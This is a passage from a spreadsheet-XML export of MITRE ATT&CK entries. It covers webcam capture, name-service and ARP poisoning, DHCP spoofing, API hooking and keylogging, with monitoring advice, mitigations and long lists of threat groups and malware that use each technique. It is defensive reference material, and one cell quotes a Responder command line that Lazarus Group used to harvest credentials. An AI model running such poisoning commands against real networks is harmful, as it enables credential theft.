[NanoCore](https://attack.mitre.org/software/S0336) can access the victim's webcam and capture data.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can capture images from webcams on compromised hosts.(Citation: Talos Oblique RAT March 2021)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) can capture camera video as part of its collection process.(Citation: Bitdefender FunnyDream Campaign November 2020)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can access a connected webcam and capture pictures.(Citation: GitHub Pupy)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can perform webcam viewing.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) can access a system’s webcam and take pictures.(Citation: Fortinet Remcos Feb 2017)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to access the webcam.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)
T9000
[T9000](https://attack.mitre.org/software/S0098) uses the Skype API to record audio and video calls. It writes encrypted data to &lt;code&gt;%APPDATA%\Intel\Skype&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can access the webcam on a victim's machine.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has a command to perform video device spying.(Citation: Talos ZxShell Oct 2014) 
jRAT
[jRAT](https://attack.mitre.org/software/S0283) has the capability to capture video from a webcam.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) can access the victim's webcam.(Citation: Fidelis njRAT June 2013)(Citation: Citizen Lab Group5)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.
Service Creation
Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045. (Citation: Secure Ideas SMB Relay) Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh)
Windows Registry Key Modification
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of "0" indicates LLMNR is disabled.
Disable or Remove Feature or Program
Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)
Filter Network Traffic
Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)
Network Intrusion Prevention
Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.
Network Segmentation
Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of AiTM activity.
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) executed [Responder](https://attack.mitre.org/software/S0174) using the command &lt;code&gt;[Responder file path] -i [IP address] -rPv&lt;/code&gt; on a compromised host to harvest credentials and move laterally.(Citation: Kaspersky ThreatNeedle Feb 2021)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.(Citation: FireEye KEGTAP SINGLEMALT October 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: Github PowerShell Empire)(Citation: GitHub Inveigh)
Impacket
[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: GitHub PoshC2)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can sniff plaintext network credentials and use NBNS Spoofing to poison name services.(Citation: GitHub Pupy)
Responder
[Responder](https://attack.mitre.org/software/S0174) is used to poison name services to gather hashes and credentials from systems within a local network.(Citation: GitHub Responder)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitor for API calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Process Metadata
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) is capable of using Windows hook interfaces for information gathering such as credential access.(Citation: Microsoft PLATINUM April 2016)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has hooked several Windows API functions to steal credentials.(Citation: Prevx Carberp March 2011)
Empire
[Empire](https://attack.mitre.org/software/S0363) contains some modules that leverage API hooking to carry out tasks, such as netripper.(Citation: Github PowerShell Empire)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) hooks processes by modifying IAT pointers to CreateWindowEx.(Citation: FinFisher Citation)(Citation: Elastic Process Injection July 2017)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)
RDFSNIFFER
[RDFSNIFFER](https://attack.mitre.org/software/S0416) hooks several Win32 API functions to hijack elements of the remote system management user-interface.(Citation: FireEye FIN7 Oct 2019)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has the ability to capture RDP credentials by capturing the &lt;code&gt;CredEnumerateA&lt;/code&gt; API(Citation: TrendMicro Trickbot Feb 2019) 
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.(Citation: TrendMicro Ursnif Mar 2015)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.(Citation: Securelist Sofacy Feb 2018)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) hooks processes by leveraging its own IAT hooked functions.(Citation: GDATA Zeus Panda June 2017)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) hooks several API functions to spawn system threads.(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.
Disable or Remove Feature or Program
Consider disabling updating the ARP cache on gratuitous ARP replies.
Encrypt Sensitive Information
Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.
Filter Network Traffic
Consider enabling DHCP Snooping and Dynamic ARP Inspection on switches to create mappings between IP addresses requested via DHCP and ARP tables and tie the values to a port on the switch that may block bogus traffic.(Citation: Cisco ARP Poisoning Mitigation 2016)(Citation: Juniper DAI 2020)
Limit Access to Resource Over Network
Create static ARP entries for networked devices. Implementing static ARP entries may be infeasible for large networks.
Network Intrusion Prevention
Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.
User Training
Train users to be suspicious about certificate errors. Adversaries may use their own certificates in an attempt to intercept HTTPS traffic. Certificate errors may arise when the application’s certificate does not match the one expected by the host.
Cleaver
[Cleaver](https://attack.mitre.org/groups/G0003) has used custom tools to facilitate ARP cache poisoning.(Citation: Cylance Cleaver)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used ARP spoofing to redirect a compromised machine to an actor-controlled website.(Citation: Bitdefender LuminousMoth July 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor application logs for changes to settings and other events associated with network protocols and other services commonly abused for AiTM.(Citation: dhcp_serv_op_events)
Network Traffic Content
Monitor network traffic for anomalies associated with known AiTM behavior.
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.
Service Creation
Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as remote logins or process creation events.
Windows Registry Key Modification
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of "0" indicates LLMNR is disabled.
Disable or Remove Feature or Program
Disable legacy network protocols that may be used   to intercept network traffic if applicable, especially those that are not needed within an environment.
Encrypt Sensitive Information
Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.
Filter Network Traffic
Use network appliances and host-based security software to block network traffic that is not necessary within the environment, such as legacy protocols that may be leveraged for AiTM conditions.
Limit Access to Resource Over Network
Limit access to network infrastructure and resources that can be used to reshape traffic or otherwise produce AiTM conditions.
Network Intrusion Prevention
Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.
Network Segmentation
Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of AiTM activity.
User Training
Train users to be suspicious about certificate errors. Adversaries may use their own certificates in an attempt to intercept HTTPS traffic. Certificate errors may arise when the application’s certificate does not match the one expected by the host.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.(Citation: CISA AA20-301A Kimsuky)
Dok
[Dok](https://attack.mitre.org/software/S0281) proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Load
Monitor for unusual kernel driver installation activity 
File Modification
Monitor for changes made to files for unexpected modifications to access permissions and attributes  
OS API Execution
Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState (Citation: Adventures of a Keystroke)
Process Creation
Monitor for newly executed processes conducting malicious activity 
Process Metadata
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.
Windows Registry Key Modification
Monitor for changes made to windows registry keys or values for unexpected modifications
APT39
[APT39](https://attack.mitre.org/groups/G0087) has utilized tools to capture mouse movements.(Citation: FBI FLASH APT39 September 2020)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has a module to perform any API hooking it desires.(Citation: Cybereason Chaes Nov 2020) 
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect mouse events.(Citation: Korean FSI TA505 2020)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can conduct mouse event logging.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can log mouse events.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor Windows logs (ex: EIDs 1341, 1342, 1020, and 1063) for changes to DHCP settings. These may also highlight DHCP issues such as when IP allocations are low or have run out.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)
Network Traffic Content
Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor network traffic for rogue DHCPv6 activity.
Network Traffic Flow
Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.
Filter Network Traffic
Consider filtering DHCP traffic on ports 67 and 68 to/from unknown or untrusted DHCP servers. Additionally, port security may also be enabled on layer switches. Furthermore, consider enabling DHCP snooping on layer 2 switches as it will prevent DHCP spoofing attacks and starvation attacks. Consider tracking available IP addresses through a script or a tool. 
Additionally, block DHCPv6 traffic and incoming router advertisements, especially if IPv6 is not commonly used in the network.(Citation: ntlm_relaying_kerberos_del)
Network Intrusion Prevention
Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.(Citation: dhcp_serv_op_events)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Monitor for changes made to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.
Privileged Account Management
Do not allow administrator accounts that have permissions to modify the Web content of organization login portals to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
IceApple
The [IceApple](https://attack.mitre.org/software/S1022) OWA credential logger can monitor for OWA authentication requests and log the credentials.(Citation: CrowdStrike IceApple May 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Load
Monitor for unusual kernel driver installation activity 
OS API Execution
Monitor for API calls to the SetWindowsHook, GetKeyState, and GetAsyncKeyState.(Citation: Adventures of a Keystroke) and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.
Windows Registry Key Modification
Monitor for changes made to windows registry keys or values for unexpected modifications
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) gathered account credentials via a [BlackEnergy](https://attack.mitre.org/software/S0089) keylogger plugin. (Citation: Booz Allen Hamilton)(Citation: Ukraine15 - EISAC - 201603)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors obtained the password for the victim's password manager via a custom keylogger.(Citation: FoxIT Wocao December 2019)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used tools to perform keylogging.(Citation: Microsoft SIR Vol 19)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm Dec 2020)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has used a keylogging tool that records keystrokes in encrypted files.(Citation: Symantec Buckeye)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has abused the PasswordChangeNotify to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)
APT38
[APT38](https://attack.mitre.org/groups/G0082) used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used tools for capturing keystrokes.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)
Ajax Security Team
[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.(Citation: Check Point Rocket Kitten)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used a keylogger.(Citation: Kaspersky Darkhotel)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has logged the keystrokes of victims to escalate privileges.(Citation: Mandiant FIN13 Aug 2022)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
Group5
Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of capturing keystrokes.(Citation: Citizen Lab Group5)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used a PowerShell-based keylogger named `kl.ps1`.(Citation: SecureWorks August 2019)(Citation: Kaspersky Lyceum October 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used keyloggers.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes.(Citation: EST Kimsuky April 2019)(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware KiloAlfa contains keylogging functionality.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Tools)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used keylogging tools called KEYPUNCH and LONGWATCH.(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)	
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has used several different keyloggers.(Citation: Microsoft PLATINUM April 2016)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.(Citation: ESET Telebots Dec 2016)	
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) has used keylogging tools.(Citation: Symantec Sowbug Nov 2017)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors installed a credential logger on Microsoft Exchange servers. [Threat Group-3390](https://attack.mitre.org/groups/G0027) also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.(Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018)(Citation: Securelist LuckyMouse June 2018)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used keylogging tools in their operations.(Citation: TrendMicro Tonto Team October 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used key loggers to steal usernames and passwords.(Citation: District Court of NY APT10 Indictment December 2018)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can perform keylogging.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can use &lt;code&gt;GetKeyState&lt;/code&gt; and &lt;code&gt;GetKeyboardState&lt;/code&gt; to capture keystrokes on the victim’s machine.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) logs keystrokes from the victim's machine. (Citation: Cofense Astaroth Sept 2018)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can capture keystrokes on the victim’s machine.(Citation: AsyncRAT GitHub)
Attor
One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)
BADNEWS
When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) spawns a new thread to log keystrokes.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) can capture keystrokes.(Citation: Mandiant APT1 Appendix)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has a [PowerShell](https://attack.mitre.org/techniques/T1059/001)-based remote administration ability that can implement a PowerShell or C# based keylogger.(Citation: Unit42 BabyShark Apr 2019)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) has a keylogging capability.(Citation: Unit 42 BadPatch Oct 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) contains keylogging capabilities.(Citation: BH Manul Aug 2016)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has run a keylogger plug-in on a victim.(Citation: Securelist BlackEnergy Nov 2014)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing keylogging.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) logs key strokes for configured processes and sends them back to the C2 server.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can log keystrokes.(Citation: PaloAlto CardinalRat Apr 2017)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) collects keystrokes from the victim’s machine.(Citation: Symantec Catchamas April 2018)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can capture keystrokes on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can track key presses with a keylogger module.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cobalt Strike Manual 4.3 November 2020)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform keylogging on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) uses a keylogger.(Citation: F-Secure The Dukes)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can use a module to perform keylogging on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) logs keystrokes via polling by using &lt;code&gt;GetKeyState&lt;/code&gt; and &lt;code&gt;VkKeyScan&lt;/code&gt; functions.(Citation: McAfee Cuba April 2021)
DOGCALL
[DOGCALL](https://attack.mitre.org/software/S0213) is capable of logging keystrokes.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) has a keylogging capability.(Citation: TrendMicro DarkComet Sept 2014)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can download a keylogging module.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can track key presses with a keylogger module.(Citation: Prevailion DarkWatchman 2021)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) can log keystrokes.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of logging keystrokes.(Citation: FireEye Periscope March 2018)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567)’s dropper contains a keylogging executable.(Citation: Securelist Dtrack)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) can track key presses with a keylogger module.(Citation: Symantec W32.Duqu)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) contains a keylogger.(Citation: DustySky)
ECCENTRICBANDWAGON
[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture and store keystrokes.(Citation: CISA EB Aug 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) includes keylogging capabilities for Windows, Linux, and macOS systems.(Citation: Github PowerShell Empire)
EvilGrab
[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture keystrokes.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) 
FakeM
[FakeM](https://attack.mitre.org/software/S0076) contains a keylogger module.(Citation: Scarlet Mimic Jan 2016)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect keyboard events.(Citation: Korean FSI TA505 2020)
FunnyDream
The [FunnyDream](https://attack.mitre.org/software/S1044) Keyrecord component can capture keystrokes.(Citation: Bitdefender FunnyDream Campaign November 2020)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) can perform keylogging.(Citation: Fysbis Palo Alto Analysis) 
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can log keystrokes on the victim's machine.(Citation: ESET Grandoreiro April 2020)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to harvest pressed keystrokes.(Citation: ESET GreyEnergy Oct 2018)
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of capturing keystrokes on victims.(Citation: Dell TG-3390)
Helminth
The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log keystrokes.(Citation: Palo Alto OilRig May 2016)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can capture keystrokes on a compromised host.(Citation: ESET InvisiMole June 2020)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) contains a custom keylogger.(Citation: Microsoft PLATINUM April 2016)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can perform keylogging by polling the &lt;code&gt;GetAsyncKeyState()&lt;/code&gt; function.(Citation: Cybereason Kimsuky November 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has the capability to perform keylogging.(Citation: Talos Konni May 2017)
Kasidet
[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging.(Citation: Zscaler Kasidet)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) installs a keylogger for intercepting credentials and keystrokes.(Citation: Rapid7 KeyBoy Jun 2013)
Kivars
[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.(Citation: Objective-See MacMa Nov 2021)(Citation: SentinelOne MacMa Nov 2021)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) captures keystrokes.(Citation: objsee mac malware 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) logs keystrokes from the victim’s machine.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can capture all keystrokes on a compromised host.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) is capable of keylogging.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has a command to launch a keylogger and capture keystrokes on the victim’s machine.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) 
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) has keylogging capabilities.(Citation: Radware Micropsia July 2018)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) has a keylogger.(Citation: Palo Alto MoonWind March 2017)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can perform keylogging.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) can perform keylogging on the victim’s machine.(Citation: PaloAlto NanoCore Feb 2016)
NavRAT
[NavRAT](https://attack.mitre.org/software/S0247) logs the keystrokes on the targeted system.(Citation: Talos NavRAT May 2018)
NetTraveler
[NetTraveler](https://attack.mitre.org/software/S0033) contains a keylogger.(Citation: Kaspersky NetTraveler)
NightClub
